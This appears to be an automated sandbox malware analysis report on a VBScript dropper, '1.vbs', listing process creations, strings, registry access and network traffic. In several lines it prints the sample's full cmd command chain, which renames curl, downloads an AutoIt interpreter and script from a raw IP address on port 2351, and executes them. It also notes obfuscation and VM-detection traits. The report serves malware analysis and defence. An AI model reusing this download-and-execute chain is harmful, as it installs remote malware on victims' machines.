Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043590B0	6_3_043590B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435B0BF	6_3_0435B0BF
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436F1AC	6_3_0436F1AC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435C2EB	6_3_0435C2EB
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04328310	6_3_04328310
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436230F	6_3_0436230F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436F3E8	6_3_0436F3E8
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434ECA3	6_3_0434ECA3
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435CC9A	6_3_0435CC9A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04331CF0	6_3_04331CF0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04369D26	6_3_04369D26
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042F0E4D	6_3_042F0E4D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434DE5F	6_3_0434DE5F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04351EA0	6_3_04351EA0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436EE9D	6_3_0436EE9D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042F8EE0	6_3_042F8EE0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04369ED6	6_3_04369ED6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04346F30	6_3_04346F30
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04352F20	6_3_04352F20
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436E8B1	6_3_0436E8B1
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A98BF	6_3_042A98BF
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04326881	6_3_04326881
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435D8C2	6_3_0435D8C2
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436E968	6_3_0436E968
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436EB6E	6_3_0436EB6E
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04339B6B	6_3_04339B6B
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436FB69	6_3_0436FB69
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042F77CE	6_3_042F77CE

Source: C:\bpzs\bpzs.exe	Code function: String function: 00007FF7F8D03018 appears 38 times
Source: C:\bpzs\bpzs.exe	Code function: String function: 00007FF7F8D10120 appears 50 times
Source: C:\bpzs\bpzs.exe	Code function: String function: 00007FF7F8D0FADC appears 36 times
Source: C:\bpzs\bpzs.exe	Code function: String function: 00007FF7F8D16714 appears 248 times
Source: C:\bpzs\bpzs.exe	Code function: String function: 00007FF7F8D167AC appears 221 times
Source: C:\bpzs\Autoit3.exe	Code function: String function: 042F994C appears 40 times

Source: 1.vbs

Initial sample: Strings found which are bigger than 50

Source: 1.vbs

Virustotal: Detection: 11%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\bpzs\bpzs.exe bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351
Source: C:\Windows\System32\cmd.exe	Process created: C:\bpzs\bpzs.exe bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi
Source: C:\Windows\System32\cmd.exe	Process created: C:\bpzs\Autoit3.exe Autoit3.exe szkzjr.au3
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\bpzs\bpzs.exe bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\bpzs\bpzs.exe bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\bpzs\Autoit3.exe Autoit3.exe szkzjr.au3	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winVBS@10/5@0/1

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\bpzs\bpzs.exe

Code function: 4_2_00007FF7F8D12C90 GetLastError,_errno,__sys_nerr,strerror,strncpy,FormatMessageA,__swprintf_l,_errno,_errno,GetLastError,SetLastError,

4_2_00007FF7F8D12C90

Source: C:\bpzs\Autoit3.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_01

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs"

Source: bpzs.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: bpzs.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: bpzs.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: bpzs.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: Autoit3.exe	String found in binary or memory: The device has succeeded a query-stop and its resource requirements have changed.

Source:	Binary string: wntdll.pdbUGP source: Autoit3.exe, 00000006.00000003.384313885.0000000004206000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000003.384341442.00000000040F4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384687350.000000000427C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Autoit3.exe, Autoit3.exe, 00000006.00000003.384313885.0000000004206000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000003.384341442.00000000040F4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384687350.000000000427C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: curl.pdb source: bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.dr

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: ShellExecute("cmd", "/c mkdir c:\bpzs & cd /d c:\bpzs & copy", "", "", "0");

Source: C:\bpzs\Autoit3.exe

Code function: 6_3_042F9991 push ecx; ret

6_3_042F99A4

Source: C:\bpzs\bpzs.exe

Code function: 4_2_00007FF7F8D2E068 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,

4_2_00007FF7F8D2E068

Source: C:\Windows\System32\cmd.exe	File created: C:\bpzs\bpzs.exe			Jump to dropped file
Source: C:\bpzs\bpzs.exe	File created: C:\bpzs\Autoit3.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 2351
Source: unknown	Network traffic detected: HTTP traffic on port 2351 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 2351
Source: unknown	Network traffic detected: HTTP traffic on port 2351 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 2351
Source: unknown	Network traffic detected: HTTP traffic on port 2351 -> 49715

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\bpzs\Autoit3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\bpzs\bpzs.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_4-29283

Source: C:\Windows\System32\wscript.exe TID: 1360

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\bpzs\Autoit3.exe

Code function: 6_3_042D3450 rdtsc

6_3_042D3450

Source: C:\bpzs\bpzs.exe

API coverage: 5.2 %

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: Autoit3.exe, 00000006.00000002.384702251.000000000439B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: microsoft hyper-v video
Source: Autoit3.exe, 00000006.00000002.384702251.000000000439B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: &microsoft hyper-v video
Source: wscript.exe, 00000001.00000003.366607062.00000185DFE5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366834023.00000185DFE5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.366567814.00000185DFE5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWo
Source: wscript.exe, 00000001.00000003.366607062.00000185DFE5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366834023.00000185DFE5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.366567814.00000185DFE5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000001.00000003.366650857.00000185DFE11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.366599997.00000185DFE10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366821514.00000185DFDEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWA
Source: bpzs.exe, 00000005.00000002.383511096.000001CC77562000.00000004.00000020.00020000.00000000.sdmp, bpzs.exe, 00000005.00000003.383469014.000001CC7755F000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384514086.0000000000D35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll__

Source: C:\bpzs\bpzs.exe

Code function: 4_2_00007FF7F8D48BB4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00007FF7F8D48BB4

Source: C:\bpzs\bpzs.exe

Code function: 4_2_00007FF7F8D2E068 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,

4_2_00007FF7F8D2E068

Source: C:\bpzs\Autoit3.exe

Code function: 6_3_042D3450 rdtsc

6_3_042D3450

Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042AA420 mov ecx, dword ptr fs:[00000030h]	6_3_042AA420
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432742A mov eax, dword ptr fs:[00000030h]	6_3_0432742A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E468 mov eax, dword ptr fs:[00000030h]	6_3_0435E468
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434B44A mov ecx, dword ptr fs:[00000030h]	6_3_0434B44A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434B44A mov eax, dword ptr fs:[00000030h]	6_3_0434B44A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434B44A mov eax, dword ptr fs:[00000030h]	6_3_0434B44A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434B44A mov eax, dword ptr fs:[00000030h]	6_3_0434B44A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0429E4A9 mov eax, dword ptr fs:[00000030h]	6_3_0429E4A9
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043314A5 mov eax, dword ptr fs:[00000030h]	6_3_043314A5
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043434AC mov eax, dword ptr fs:[00000030h]	6_3_043434AC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043434AC mov eax, dword ptr fs:[00000030h]	6_3_043434AC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043434AC mov eax, dword ptr fs:[00000030h]	6_3_043434AC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04350490 mov eax, dword ptr fs:[00000030h]	6_3_04350490
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432648A mov eax, dword ptr fs:[00000030h]	6_3_0432648A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432648A mov eax, dword ptr fs:[00000030h]	6_3_0432648A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432648A mov eax, dword ptr fs:[00000030h]	6_3_0432648A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D84EC mov eax, dword ptr fs:[00000030h]	6_3_042D84EC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042BC4C1 mov eax, dword ptr fs:[00000030h]	6_3_042BC4C1
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042BC4C1 mov eax, dword ptr fs:[00000030h]	6_3_042BC4C1
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042BC4C1 mov eax, dword ptr fs:[00000030h]	6_3_042BC4C1
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042BC4C1 mov eax, dword ptr fs:[00000030h]	6_3_042BC4C1
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043464C4 mov eax, dword ptr fs:[00000030h]	6_3_043464C4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E4C6 mov eax, dword ptr fs:[00000030h]	6_3_0435E4C6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043354C0 mov eax, dword ptr fs:[00000030h]	6_3_043354C0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043354C0 mov eax, dword ptr fs:[00000030h]	6_3_043354C0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043354C0 mov eax, dword ptr fs:[00000030h]	6_3_043354C0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043234CA mov eax, dword ptr fs:[00000030h]	6_3_043234CA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043234CA mov eax, dword ptr fs:[00000030h]	6_3_043234CA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043234CA mov eax, dword ptr fs:[00000030h]	6_3_043234CA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043234CA mov eax, dword ptr fs:[00000030h]	6_3_043234CA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D5520 mov eax, dword ptr fs:[00000030h]	6_3_042D5520
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433152B mov eax, dword ptr fs:[00000030h]	6_3_0433152B
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E2530 mov eax, dword ptr fs:[00000030h]	6_3_042E2530
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A1570 mov eax, dword ptr fs:[00000030h]	6_3_042A1570
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434C550 mov eax, dword ptr fs:[00000030h]	6_3_0434C550
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434C550 mov eax, dword ptr fs:[00000030h]	6_3_0434C550
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043235B0 mov eax, dword ptr fs:[00000030h]	6_3_043235B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043235B0 mov eax, dword ptr fs:[00000030h]	6_3_043235B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043235B0 mov eax, dword ptr fs:[00000030h]	6_3_043235B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043425B0 mov eax, dword ptr fs:[00000030h]	6_3_043425B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043425B0 mov eax, dword ptr fs:[00000030h]	6_3_043425B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043315BE mov eax, dword ptr fs:[00000030h]	6_3_043315BE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043315BE mov eax, dword ptr fs:[00000030h]	6_3_043315BE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043555A0 mov ecx, dword ptr fs:[00000030h]	6_3_043555A0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042AD5B6 mov eax, dword ptr fs:[00000030h]	6_3_042AD5B6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E259B mov eax, dword ptr fs:[00000030h]	6_3_042E259B
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04350580 mov eax, dword ptr fs:[00000030h]	6_3_04350580
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E25E0 mov eax, dword ptr fs:[00000030h]	6_3_042E25E0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A75F0 mov eax, dword ptr fs:[00000030h]	6_3_042A75F0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042C45F0 mov eax, dword ptr fs:[00000030h]	6_3_042C45F0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043275DD mov eax, dword ptr fs:[00000030h]	6_3_043275DD
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043275DD mov eax, dword ptr fs:[00000030h]	6_3_043275DD
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043495C4 mov eax, dword ptr fs:[00000030h]	6_3_043495C4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436863B mov ebx, dword ptr fs:[00000030h]	6_3_0436863B
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435C612 mov eax, dword ptr fs:[00000030h]	6_3_0435C612
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04355607 mov eax, dword ptr fs:[00000030h]	6_3_04355607
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04350600 mov eax, dword ptr fs:[00000030h]	6_3_04350600
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042C4610 mov eax, dword ptr fs:[00000030h]	6_3_042C4610
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A7660 mov eax, dword ptr fs:[00000030h]	6_3_042A7660
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04375655 mov eax, dword ptr fs:[00000030h]	6_3_04375655
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042DC65B mov eax, dword ptr fs:[00000030h]	6_3_042DC65B
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042DC65B mov eax, dword ptr fs:[00000030h]	6_3_042DC65B
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042AD650 mov eax, dword ptr fs:[00000030h]	6_3_042AD650
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042AD650 mov eax, dword ptr fs:[00000030h]	6_3_042AD650
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043556B1 mov eax, dword ptr fs:[00000030h]	6_3_043556B1
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434C6B0 mov eax, dword ptr fs:[00000030h]	6_3_0434C6B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434C6B0 mov eax, dword ptr fs:[00000030h]	6_3_0434C6B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434C6B0 mov eax, dword ptr fs:[00000030h]	6_3_0434C6B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434C6B0 mov eax, dword ptr fs:[00000030h]	6_3_0434C6B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436C6A2 mov eax, dword ptr fs:[00000030h]	6_3_0436C6A2
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436C6A2 mov eax, dword ptr fs:[00000030h]	6_3_0436C6A2
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436C6A2 mov eax, dword ptr fs:[00000030h]	6_3_0436C6A2
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436C6A2 mov eax, dword ptr fs:[00000030h]	6_3_0436C6A2
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435C693 mov eax, dword ptr fs:[00000030h]	6_3_0435C693
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04323689 mov eax, dword ptr fs:[00000030h]	6_3_04323689
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04323689 mov eax, dword ptr fs:[00000030h]	6_3_04323689
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04323689 mov eax, dword ptr fs:[00000030h]	6_3_04323689
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04323689 mov ecx, dword ptr fs:[00000030h]	6_3_04323689
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04323689 mov eax, dword ptr fs:[00000030h]	6_3_04323689
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04323689 mov eax, dword ptr fs:[00000030h]	6_3_04323689
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432B6F0 mov eax, dword ptr fs:[00000030h]	6_3_0432B6F0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435C6FF mov eax, dword ptr fs:[00000030h]	6_3_0435C6FF
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043216D0 mov eax, dword ptr fs:[00000030h]	6_3_043216D0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043216D0 mov eax, dword ptr fs:[00000030h]	6_3_043216D0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043216D0 mov ecx, dword ptr fs:[00000030h]	6_3_043216D0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043216D0 mov eax, dword ptr fs:[00000030h]	6_3_043216D0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043216D0 mov eax, dword ptr fs:[00000030h]	6_3_043216D0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432F6D4 mov eax, dword ptr fs:[00000030h]	6_3_0432F6D4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04331730 mov eax, dword ptr fs:[00000030h]	6_3_04331730
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04327720 mov eax, dword ptr fs:[00000030h]	6_3_04327720
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04327720 mov eax, dword ptr fs:[00000030h]	6_3_04327720
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04327720 mov eax, dword ptr fs:[00000030h]	6_3_04327720
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04327720 mov eax, dword ptr fs:[00000030h]	6_3_04327720
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D0730 mov eax, dword ptr fs:[00000030h]	6_3_042D0730
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042DE700 mov eax, dword ptr fs:[00000030h]	6_3_042DE700
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04367704 mov eax, dword ptr fs:[00000030h]	6_3_04367704
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04367704 mov eax, dword ptr fs:[00000030h]	6_3_04367704
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04342700 mov eax, dword ptr fs:[00000030h]	6_3_04342700
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04345700 mov eax, dword ptr fs:[00000030h]	6_3_04345700
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04345700 mov eax, dword ptr fs:[00000030h]	6_3_04345700
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04353700 mov eax, dword ptr fs:[00000030h]	6_3_04353700
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432870A mov edi, dword ptr fs:[00000030h]	6_3_0432870A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042CB710 mov eax, dword ptr fs:[00000030h]	6_3_042CB710
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042CB710 mov eax, dword ptr fs:[00000030h]	6_3_042CB710
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434877A mov edi, dword ptr fs:[00000030h]	6_3_0434877A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434877A mov eax, dword ptr fs:[00000030h]	6_3_0434877A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432F763 mov eax, dword ptr fs:[00000030h]	6_3_0432F763
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338760 mov eax, dword ptr fs:[00000030h]	6_3_04338760
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338760 mov eax, dword ptr fs:[00000030h]	6_3_04338760
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436D765 mov eax, dword ptr fs:[00000030h]	6_3_0436D765
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436D765 mov eax, dword ptr fs:[00000030h]	6_3_0436D765
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436D765 mov eax, dword ptr fs:[00000030h]	6_3_0436D765
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433C747 mov eax, dword ptr fs:[00000030h]	6_3_0433C747
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04328749 mov edi, dword ptr fs:[00000030h]	6_3_04328749
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]	6_3_043437B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]	6_3_043437B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]	6_3_043437B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]	6_3_043437B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]	6_3_043437B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]	6_3_043437B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]	6_3_043437B0
